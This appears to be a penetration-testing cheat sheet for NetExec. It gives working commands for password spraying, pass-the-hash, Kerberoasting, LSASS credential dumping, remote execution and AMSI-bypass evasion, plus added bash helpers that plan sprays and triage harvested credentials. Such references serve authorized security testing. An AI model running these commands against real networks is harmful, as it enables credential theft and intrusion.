NetExec


NetExec (formerly CrackMapExec, hence the short command name nxc) is a post-exploitation tool that automates the security assessment of large Active Directory networks by abusing network protocols (SMB, WinRM, LDAP, MSSQL, SSH and others) and running credential attacks against them. Everything it discovers (hosts, credentials, shares) is written to a local database so results can be queried later.

Installation

sudo apt install netexec
    Install from the Kali repositories
pipx install git+https://github.com/Pennyw0rth/NetExec
    Install with pipx straight from GitHub (recommended; keeps NetExec's dependencies isolated)
git clone https://github.com/Pennyw0rth/NetExec.git
    Clone the source
cd NetExec && pip3 install .
    Install from the cloned source
netexec --version
    Check the installed version (the same tool is also installed as nxc)
netexec --help
    Display help; netexec <protocol> --help lists the options of one protocol

Basic Usage

netexec smb 192.168.1.0/24
    Scan SMB across a subnet with no credentials (hostname, domain, OS and SMB signing status per host)
netexec smb 192.168.1.100 -u username -p password
    Authenticate with a password
netexec smb 192.168.1.100 -u username -H ntlmhash
    Authenticate with an NTLM hash (pass-the-hash)
netexec smb 192.168.1.100 -u '' -p ''
    Null session (anonymous) access
netexec smb targets.txt -u username -p password
    Read targets from a file, one IP, hostname, range or CIDR per line

Protocol Support

SMB Protocol

netexec smb 192.168.1.100
    Basic SMB enumeration: hostname, domain, OS build, SMB signing, SMBv1 support
netexec smb 192.168.1.100 --shares
    Enumerate shares and the READ/WRITE access the account has on each
netexec smb 192.168.1.100 --users
    Enumerate domain users
netexec smb 192.168.1.100 --groups
    Enumerate domain groups
netexec smb 192.168.1.100 --local-groups
    Enumerate local groups on the target
netexec smb 192.168.1.100 --sessions
    Enumerate active SMB sessions
netexec smb 192.168.1.100 --disks
    Enumerate local disks (requires administrative access)

Everything below the first row needs an account: add -u/-p (or -H) as in Basic Usage, or -u '' -p '' to try a null session.

WinRM Protocol

netexec winrm 192.168.1.100 -u username -p password
    WinRM authentication (a successful login means the account can run code on the host)
netexec winrm 192.168.1.100 -u username -p password -x "whoami"
    Execute a command
netexec winrm 192.168.1.100 -u username -p password -X "Get-Process"
    Execute a PowerShell command (-X takes the command text, not a script path)

LDAP Protocol

netexec ldap 192.168.1.100 -u username -p password
    LDAP authentication
netexec ldap 192.168.1.100 -u username -p password --users
    Enumerate domain users, including the description attribute (a common place to find passwords)
netexec ldap 192.168.1.100 -u username -p password --groups
    Enumerate domain groups
netexec ldap 192.168.1.100 -u username -p password --computers
    Enumerate computer accounts

MSSQL Protocol

netexec mssql 192.168.1.100 -u username -p password
    MSSQL authentication with a Windows (domain) account
netexec mssql 192.168.1.100 -u username -p password -q "SELECT @@version"
    Execute a SQL query
netexec mssql 192.168.1.100 -u username -p password --local-auth
    Authenticate as a SQL Server login (for example sa) instead of a Windows account

SSH Protocol

netexec ssh 192.168.1.100 -u username -p password
    SSH password authentication
netexec ssh 192.168.1.100 -u username --key-file id_rsa
    SSH key authentication (pass the key's passphrase with -p if it has one)
netexec ssh 192.168.1.100 -u username -p password -x "id"
    Execute a command

Authentication Methods

Password Authentication

netexec smb 192.168.1.100 -u username -p password
    Single credential
netexec smb 192.168.1.100 -u users.txt -p passwords.txt
    Credential lists: every user is tried with every password; add --no-bruteforce to pair line N of one file with line N of the other
netexec smb 192.168.1.100 -u username -p passwords.txt
    Many passwords against one user (brute force; this is exactly what the lockout threshold counts)
netexec smb 192.168.1.100 -u users.txt -p password
    One password against many users (password spraying; one failed attempt per user per round)

Hash Authentication

netexec smb 192.168.1.100 -u username -H ntlmhash
    NTLM hash (pass-the-hash)
netexec smb 192.168.1.100 -u username -H lmhash:ntlmhash
    LM:NTLM pair; on modern hosts the LM half is the empty-LM constant aad3b435b51404eeaad3b435b51404ee
netexec smb 192.168.1.100 -u users.txt -H hashes.txt
    Hash lists (same combination rules as password lists)

Kerberos Authentication

netexec smb dc.domain.com -u username -p password -k
    Kerberos authentication (-k is --kerberos); target hosts by name, not IP, so the ticket's SPN matches
netexec smb dc.domain.com -u username --use-kcache
    Use the ticket in the ccache pointed to by KRB5CCNAME (for example one obtained with impacket-getTGT)
netexec smb dc.domain.com -u username -p password -k --kdcHost dc.domain.com
    Name the KDC explicitly when the domain does not resolve through your DNS

Enumeration

Share Enumeration

netexec smb 192.168.1.100 --shares
    List shares over a null session (often only IPC$ is visible)
netexec smb 192.168.1.100 -u username -p password --shares
    Authenticated share listing with READ/WRITE per share
netexec smb 192.168.1.100 -u username -p password --spider SHARE
    Spider the contents of one share
netexec smb 192.168.1.100 -u username -p password --spider SHARE --pattern txt
    Spider for names containing "txt" (substring match; --regex takes a regular expression, --content also searches inside files)
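
As an added example that is not part of NetExec or of this page's original content: the bash functions below pull the writable, non-default shares out of a saved --shares run, so a subnet-wide sweep can be triaged without reading every host block by hand. SHARES_SAMPLE is constructed to mimic NetExec's share table (protocol, IP, port, hostname, then the Share / Permissions / Remark columns); it is not real output.

```shell
#!/usr/bin/env bash
# Added example, not NetExec code. Triage a saved
#   netexec smb 192.168.1.0/24 -u user -p pass --shares --log shares.log
# run for writable shares. The sample below is constructed, not captured.

SHARES_SAMPLE='SMB         192.168.1.20    445    FS01             [*] Enumerated shares
SMB         192.168.1.20    445    FS01             Share           Permissions     Remark
SMB         192.168.1.20    445    FS01             -----           -----------     ------
SMB         192.168.1.20    445    FS01             ADMIN$                          Remote Admin
SMB         192.168.1.20    445    FS01             C$                              Default share
SMB         192.168.1.20    445    FS01             IPC$            READ            Remote IPC
SMB         192.168.1.20    445    FS01             Public          READ,WRITE      Drop folder
SMB         192.168.1.20    445    FS01             Backups         READ            Nightly backups
SMB         192.168.1.21    445    APP01            [*] Enumerated shares
SMB         192.168.1.21    445    APP01            Share           Permissions     Remark
SMB         192.168.1.21    445    APP01            -----           -----------     ------
SMB         192.168.1.21    445    APP01            ADMIN$          READ,WRITE      Remote Admin
SMB         192.168.1.21    445    APP01            Scripts         READ,WRITE      Logon scripts
SMB         192.168.1.21    445    APP01            IPC$            READ            Remote IPC'

# Print "ip hostname share permissions" for every share row whose permission
# column contains WRITE, skipping the administrative shares ADMIN$, C$ and IPC$.
# Rows without a permission column (no access) have the remark in field 6, so
# field 6 is required to be exactly a permission value before it is trusted.
writable_shares() {
    printf '%s\n' "$1" | awk '
        $1 == "SMB" && NF >= 6 &&
        $6 ~ /^(READ|WRITE|READ,WRITE)$/ && $6 ~ /WRITE/ &&
        $5 != "ADMIN$" && $5 != "C$" && $5 != "IPC$" { print $2, $4, $5, $6 }'
}

# Hosts where ADMIN$ is writable: the account has administrative access there,
# which is what NetExec marks with the Pwn3d! label.
admin_share_hosts() {
    printf '%s\n' "$1" | awk '$1 == "SMB" && $5 == "ADMIN$" && $6 ~ /WRITE/ { print $2 }'
}

echo "writable non-default shares:"
writable_shares "$SHARES_SAMPLE"
echo "hosts where the account is local admin:"
admin_share_hosts "$SHARES_SAMPLE"
```

Share names containing spaces split across awk fields, so for those (or for anything beyond a quick sweep) query the database instead: NetExec records every share and permission it enumerates, and the shares command in nxcdb lists them per workspace.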

User Enumeration

netexec smb 192.168.1.100 -u username -p password --users
    Enumerate domain users
netexec smb 192.168.1.100 -u '' -p '' --rid-brute
    RID cycling over a null session (default upper bound is RID 4000)
netexec smb 192.168.1.100 -u guest -p '' --rid-brute 10000
    RID cycling up to a chosen maximum; the guest account often works where null sessions are refused

Group Enumeration

netexec smb 192.168.1.100 -u username -p password --groups
    Enumerate domain groups
netexec smb 192.168.1.100 -u username -p password --local-groups
    Local groups on the target
netexec smb 192.168.1.100 -u username -p password --groups "Domain Admins"
    Members of a specific group

Computer Enumeration

netexec ldap 192.168.1.100 -u username -p password --computers
    Enumerate computer accounts via LDAP
netexec smb 192.168.1.100 -u username -p password --computers
    Enumerate computer accounts via SMB

Command Execution

SMB Command Execution

netexec smb 192.168.1.100 -u username -p password -x "whoami"
    Execute a command (needs local admin; the default method is wmiexec with automatic fallback)
netexec smb 192.168.1.100 -u username -p password -X "Get-Process"
    Execute a PowerShell command (-X takes the command text, not a script path)
netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec -x whoami
    Force WMI execution (no service is created; output is read back over SMB)
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec -x whoami
    Force service-based execution (creates and deletes a service per command; noisier in the event log)

WinRM Command Execution

netexec winrm 192.168.1.100 -u username -p password -x "whoami /all"
    Execute a command
netexec winrm 192.168.1.100 -u username -p password -X "Get-LocalUser"
    Execute a PowerShell command

Modules

Built-in Modules

netexec smb -L
    List the modules available for a protocol
netexec smb 192.168.1.100 -u username -p password -M spider_plus
    Enhanced spidering: walks every readable share and writes a JSON inventory of the files found
netexec smb 192.168.1.100 -u username -p password -M enum_av
    Enumerate installed AV/EDR products
netexec smb 192.168.1.100 -u username -p password -M gpp_password
    Recover Group Policy Preferences passwords (cpassword values in SYSVOL)
netexec smb 192.168.1.100 -u username -p password -M lsassy
    Dump credentials from LSASS memory with lsassy (needs local admin)

Module Options

netexec smb -M spider_plus --options
    Show a module's options and their defaults
netexec smb 192.168.1.100 -u username -p password -M spider_plus -o DOWNLOAD_FLAG=True
    Set a module option (here: also download the files spider_plus finds)

Database Operations

nxcdb
    Open the interactive database shell; NetExec records hosts, credentials and shares from every run
workspace create engagement1
    Inside nxcdb: create a workspace for an engagement (workspace engagement1 switches to it, workspace list shows all)
proto smb
    Inside nxcdb: select a protocol database; hosts, creds and shares then print what was collected
export creds detailed creds.csv
    Inside nxcdb: export the collected credentials to CSV for reporting

Advanced Features

Spraying and Brute-Force Controls

netexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success
    Keep testing the remaining credentials after a valid login instead of stopping at the first hit on a host
netexec smb targets.txt -u users.txt -p passwords.txt --fail-limit 3
    Stop against a host after 3 failed logins (--ufail-limit caps failures per user, --gfail-limit globally)

Password Policy

netexec smb 192.168.1.100 -u username -p password --pass-pol
    Get the domain password and lockout policy (threshold, reset window, lockout duration) before spraying
netexec smb 192.168.1.100 -u '' -p '' --pass-pol
    Same over a null session where the DC still permits it (--pass-pol is an SMB option; the ldap protocol has no equivalent flag)

BloodHound Integration

netexec ldap dc.domain.com -u username -p password --bloodhound -c All
    Collect BloodHound data with every collection method (-c is --collection); the zip is written under ~/.nxc/logs/
netexec ldap dc.domain.com -u username -p password --bloodhound -c All --dns-server 192.168.1.10
    Point the collector at the domain's DNS server when your resolver cannot look up domain hosts

ASREPRoast

netexec ldap dc.domain.com -u users.txt -p '' --asreproast asrep.txt
    Unauthenticated: request an AS-REP for every listed user; accounts without Kerberos pre-authentication return crackable hashes
netexec ldap dc.domain.com -u username -p password --asreproast asrep.txt
    Authenticated: find accounts with "Do not require Kerberos preauthentication" via LDAP and roast them (hashcat mode 18200)

Kerberoasting

netexec ldap dc.domain.com -u username -p password --kerberoasting kerb.txt
    Request a service ticket for every user account with an SPN and save the hashes (RC4 tickets, $krb5tgs$23$, crack with hashcat mode 13100)

Output and Logging

netexec smb 192.168.1.100 --verbose
    Verbose output
netexec smb 192.168.1.100 --debug
    Debug output, including tracebacks
netexec smb 192.168.1.100 --log nxc.log
    Also write the console output to a file (every run is logged under ~/.nxc/logs/ regardless)

Configuration

Config File (~/.nxc/nxc.conf)

[nxc]
workspace = default
last_used_db = ~/.nxc/workspaces/default/nxc.db
pwn3d_label = Pwn3d!
audit_mode = False
reveal_chars_of_pwd = 0

pwn3d_label is the marker printed after a login that has administrative rights on the target. audit_mode, when set to a character such as *, replaces passwords in the console output with that character (useful for screenshots and reports), and reveal_chars_of_pwd leaves that many leading characters of each password visible.

Protocol-Specific Options

netexec smb 192.168.1.100 --port 445
    Custom port
netexec smb 192.168.1.100 --timeout 5
    Connection timeout in seconds
netexec smb 192.168.1.100 --threads 100
    Concurrent target threads (default 256; lower it on fragile hosts or to reduce noise)

Evasion Techniques

netexec smb 192.168.1.100 -u username -p password --jitter 1-5
    Random delay of 1 to 5 seconds between authentication attempts
netexec smb 192.168.1.100 -u username -p password -X "Get-Process" --obfs
    Obfuscate the PowerShell passed with -X
netexec smb 192.168.1.100 -u username -p password -X "Get-Process" --amsi-bypass bypass.ps1
    Prepend your own AMSI bypass to the PowerShell passed with -X

Common Attack Scenarios

Domain Enumeration

# Basic domain enumeration (users, groups and computers over SMB)
netexec smb dc.domain.com -u username -p password --users --groups --computers

# Share enumeration across the subnet
netexec smb 192.168.1.0/24 -u username -p password --shares

# Password and lockout policy (read this before any spraying)
netexec smb dc.domain.com -u username -p password --pass-pol

Credential Attacks

# Password spraying: one password per user per round, keep going after hits
netexec smb 192.168.1.0/24 -u users.txt -p 'Password123!' --continue-on-success

# Hash spraying a local administrator hash across the subnet (pass-the-hash with a local account)
netexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 --local-auth

# ASREPRoast without credentials
netexec ldap dc.domain.com -u users.txt -p '' --asreproast asrep_hashes.txt
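
An added example (not NetExec code and not from the original page) tying together the Password Authentication table, the --pass-pol and spraying-control options above and the spray in this scenario: read the lockout threshold and reset window from saved --pass-pol output, work out how many passwords can be sprayed per user inside one window, and triage the spray output into valid logins, local-admin logins and accounts that are already locked. Both sample outputs are constructed to follow NetExec's line format ([+]/[-] status, DOMAIN\user:password, optional (Pwn3d!) label, NT status on failure) rather than captured from a real domain.

```shell
#!/usr/bin/env bash
# Added example, not NetExec code. Spray planning and triage from saved
# NetExec output (e.g. runs recorded with --log). Both samples are constructed.

PASSPOL_SAMPLE='SMB         10.10.10.10     445    DC01             [+] Dumping password info for domain: CORP
SMB         10.10.10.10     445    DC01             Minimum password length: 7
SMB         10.10.10.10     445    DC01             Password history length: 24
SMB         10.10.10.10     445    DC01             Reset Account Lockout Counter: 30 minutes
SMB         10.10.10.10     445    DC01             Locked Account Duration: 30 minutes
SMB         10.10.10.10     445    DC01             Account Lockout Threshold: 5'

SPRAY_SAMPLE='SMB         10.10.10.10     445    DC01             [-] CORP\alice:Spring2024! STATUS_LOGON_FAILURE
SMB         10.10.10.10     445    DC01             [+] CORP\bob:Spring2024!
SMB         10.10.10.10     445    DC01             [+] CORP\carol:Spring2024! (Pwn3d!)
SMB         10.10.10.10     445    DC01             [-] CORP\dave:Spring2024! STATUS_ACCOUNT_LOCKED_OUT'

# First integer following "<label>:" in saved --pass-pol output; empty if absent.
passpol_value() {  # $1 = saved output, $2 = label text
    printf '%s\n' "$1" | sed -n "s/.*$2: *\([0-9]*\).*/\1/p" | head -n 1
}
lockout_threshold()    { passpol_value "$1" 'Account Lockout Threshold'; }
lockout_reset_minutes() { passpol_value "$1" 'Reset Account Lockout Counter'; }

# Passwords that can be sprayed per user within one reset window, keeping a
# margin of two attempts under the threshold (a user may have mistyped their
# own password already). No threshold (empty, 0 or None) means no lockout.
safe_attempts_per_window() {  # $1 = lockout threshold
    case "$1" in
        ''|0|None) echo unlimited ;;
        *) n=$(( $1 - 2 )); if [ "$n" -lt 1 ]; then n=1; fi; echo "$n" ;;
    esac
}

# DOMAIN\user:password for every login NetExec marked valid ([+]).
valid_creds() {
    printf '%s\n' "$1" | sed -n 's/.*\[+\] \([^ ]*\).*/\1/p'
}

# Valid logins that are also local admin on the target (Pwn3d! label).
admin_creds() {
    printf '%s\n' "$1" | grep -F '(Pwn3d!)' | sed -n 's/.*\[+\] \([^ ]*\).*/\1/p'
}

# Number of accounts the spray found already locked; any non-zero value means stop.
locked_accounts() {
    printf '%s\n' "$1" | grep -c 'STATUS_ACCOUNT_LOCKED_OUT' || true
}

threshold=$(lockout_threshold "$PASSPOL_SAMPLE")
echo "lockout threshold: $threshold, reset window: $(lockout_reset_minutes "$PASSPOL_SAMPLE") min"
echo "safe passwords per user per window: $(safe_attempts_per_window "$threshold")"
echo "valid logins:"; valid_creds "$SPRAY_SAMPLE"
echo "local admin:"; admin_creds "$SPRAY_SAMPLE"
echo "locked-out accounts seen: $(locked_accounts "$SPRAY_SAMPLE")"
```

Run the policy check once, spray at most safe_attempts_per_window passwords per user inside each reset window, and stop entirely as soon as locked_accounts is non-zero: a lockout during a spray usually means the threshold or window was misread, or someone else is hitting the same domain.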

Post-Exploitation

# Command execution
netexec smb 192.168.1.100 -u username -p password -x "net user /domain"

# LSASS credential dumping (local admin required)
netexec smb 192.168.1.100 -u username -p password -M lsassy

# BloodHound collection
netexec ldap dc.domain.com -u username -p password --bloodhound -c All

Integration with Other Tools

Impacket Integration

NetExec is built on Impacket, so the execution methods below are Impacket's and the hashes and tickets it collects work directly with Impacket's own scripts.

netexec smb 192.168.1.100 -u username -p password --exec-method wmiexec -x whoami
    Execute through Impacket's wmiexec
netexec smb 192.168.1.100 -u username -p password --exec-method smbexec -x whoami
    Execute through Impacket's smbexec

CrackMapExec Migration

alias cme='netexec'
    Shell alias so old notes and scripts keep working; protocol names and most flags are unchanged
ls ~/.nxc/
    NetExec keeps its config, logs and workspace databases here, replacing CrackMapExec's ~/.cme/

Troubleshooting

netexec --help
    General help
netexec smb --help
    Protocol-specific help
netexec --version
    Version information
netexec smb 192.168.1.100 --debug
    Debug mode with full tracebacks

Best Practices

  • Read the password and lockout policy with --pass-pol before any spraying
  • Prefer authenticated enumeration: null sessions return little and fail on hardened domains
  • Use --jitter and a lower --threads count so runs neither overwhelm targets nor trip rate-based detections
  • Keep one nxcdb workspace per engagement
  • Export results for analysis and reporting
  • Combine with BloodHound, Impacket and a password cracker for a complete assessment
  • Watch for defensive responses (lockouts, blocked hosts, alerts) while a run is in progress
  • Keep --log output as the record of what was run, where and when
  • Validate a credential against one host before using it at scale
  • Use --obfs or a custom AMSI bypass only when PowerShell execution is actually being blocked

Security Considerations

  • Use only on networks you are authorized to test
  • Restrict access to the operator machine: ~/.nxc/ holds every credential and hash collected
  • Expect detection by EDR and SIEM; spraying, service creation by smbexec and LSASS access by lsassy are all well-known signatures
  • Use the least-privileged account that achieves the objective
  • Document all activity for the engagement record and compliance
  • Coordinate with the blue team where applicable
  • Clean up afterwards: memory dumps, uploaded files and any services or tasks created on targets
  • Store collected credentials securely and destroy them when the engagement ends
  • Use encrypted channels where possible (SMB signing and encryption, WinRM over HTTPS, LDAPS)
  • Keep NetExec updated so protocol handling and modules stay effective